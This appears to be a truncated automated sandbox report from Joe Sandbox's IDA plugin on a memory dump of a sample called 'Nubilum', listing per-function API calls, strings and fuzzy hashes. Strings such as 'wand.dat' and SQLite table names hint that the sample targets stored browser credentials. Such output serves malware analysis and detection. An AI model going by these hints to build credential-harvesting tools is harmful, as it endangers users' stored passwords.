                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$memcpy
                          • String ID:
                          • API String ID: 368790112-0
                          • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                          • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                          • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                          • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                          APIs
                            • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                            • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                            • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                          • GetMenu.USER32(?), ref: 00410F8D
                          • GetSubMenu.USER32(00000000), ref: 00410F9A
                          • GetSubMenu.USER32(00000000), ref: 00410F9D
                          • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Menu$ItemMessageSend$CheckEnableRadio
                          • String ID:
                          • API String ID: 1889144086-0
                          • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                          • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                          • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                          • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                          APIs
                          • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                          • GetLastError.KERNEL32 ref: 0041810A
                          • CloseHandle.KERNEL32(00000000), ref: 00418120
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: File$CloseCreateErrorHandleLastMappingView
                          • String ID:
                          • API String ID: 1661045500-0
                          • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                          • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                          • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                          • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                          APIs
                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                          • memcpy.MSVCRT ref: 0042EC7A
                          Strings
                          • virtual tables may not be altered, xrefs: 0042EBD2
                          • sqlite_altertab_%s, xrefs: 0042EC4C
                          • Cannot add a column to a view, xrefs: 0042EBE8
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                          • API String ID: 1297977491-2063813899
                          • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                          • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                          • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                          • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                          APIs
                          • memset.MSVCRT ref: 0040560C
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                          • String ID: *.*$dat$wand.dat
                          • API String ID: 2618321458-1828844352
                          • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                          • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                          APIs
                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                          • wcslen.MSVCRT ref: 00410C74
                          • _wtoi.MSVCRT ref: 00410C80
                          • _wcsicmp.MSVCRT ref: 00410CCE
                          • _wcsicmp.MSVCRT ref: 00410CDF
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                          • String ID:
                          • API String ID: 1549203181-0
                          • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                          • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                          • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                          • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                          APIs
                          • memset.MSVCRT ref: 00412057
                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                          • GetKeyState.USER32(00000010), ref: 0041210D
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                          • String ID:
                          • API String ID: 3550944819-0
                          • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                          • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                          APIs
                          • wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                          • memcpy.MSVCRT ref: 0040A94F
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@$memcpy$mallocwcslen
                          • String ID:
                          • API String ID: 3023356884-0
                          • Opcode ID: 414ffd522c354c44d911202dbb7fb969b997b2727503747ec2ffb07ed2ee07d7
                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                          • Opcode Fuzzy Hash: 414ffd522c354c44d911202dbb7fb969b997b2727503747ec2ffb07ed2ee07d7
                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                          APIs
                          • wcslen.MSVCRT ref: 0040B1DE
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                          • memcpy.MSVCRT ref: 0040B248
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@$memcpy$mallocwcslen
                          • String ID:
                          • API String ID: 3023356884-0
                          • Opcode ID: 00a30dcf632695cd8a34016e93c80dbd960092823cc19526dd2896a4ba07b16a
                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                          • Opcode Fuzzy Hash: 00a30dcf632695cd8a34016e93c80dbd960092823cc19526dd2896a4ba07b16a
                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: @
                          • API String ID: 3510742995-2766056989
                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??2@??3@memcpymemset
                          • String ID:
                          • API String ID: 1865533344-0
                          • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                          • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                          • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                          • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                          APIs
                          • strlen.MSVCRT ref: 0040B0D8
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                          • memcpy.MSVCRT ref: 0040B159
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@$memcpy$mallocstrlen
                          • String ID:
                          • API String ID: 1171893557-0
                          • Opcode ID: 4b44bdb18b20ed3b2c0c3afb5fa92155fa3f083da651cc3e9fadc8496464885a
                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                          • Opcode Fuzzy Hash: 4b44bdb18b20ed3b2c0c3afb5fa92155fa3f083da651cc3e9fadc8496464885a
                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                          APIs
                          • memset.MSVCRT ref: 004144E7
                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                            • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                          • memset.MSVCRT ref: 0041451A
                          • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                          • String ID:
                          • API String ID: 1127616056-0
                          • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                          • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: sqlite_master
                          • API String ID: 438689982-3163232059
                          • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                          • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                          • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                          • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                          APIs
                          • SHGetMalloc.SHELL32(?), ref: 00414D9A
                          • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                          • wcscpy.MSVCRT ref: 00414DF3
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: BrowseFolderFromListMallocPathwcscpy
                          • String ID:
                          • API String ID: 3917621476-0
                          • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                          • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                          • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                          • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                          APIs
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                          • _snwprintf.MSVCRT ref: 00410FE1
                          • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                          • _snwprintf.MSVCRT ref: 0041100C
                          • wcscat.MSVCRT ref: 0041101F
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                          • String ID:
                          • API String ID: 822687973-0
                          • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                          • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                          • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                          • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                          APIs
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
                          • malloc.MSVCRT ref: 00417459
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,771ADF80,?,0041755F,?), ref: 00417478
                          • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$??3@malloc
                          • String ID:
                          • API String ID: 4284152360-0
                          • Opcode ID: 4f6da64b03b6c84002c909cf9dcc8042fee6eba1d3d37644ca2334bf0aecddb0
                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                          • Opcode Fuzzy Hash: 4f6da64b03b6c84002c909cf9dcc8042fee6eba1d3d37644ca2334bf0aecddb0
                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                          • RegisterClassW.USER32(00000001), ref: 00412428
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: HandleModule$ClassCreateRegisterWindow
                          • String ID:
                          • API String ID: 2678498856-0
                          • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                          • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                          APIs
                          • GetDlgItem.USER32(?,?), ref: 00409B40
                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: MessageSend$Item
                          • String ID:
                          • API String ID: 3888421826-0
                          • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                          • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                          • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                          • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                          APIs
                          • memset.MSVCRT ref: 00417B7B
                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                          • GetLastError.KERNEL32 ref: 00417BB5
                          Memory Dump Source
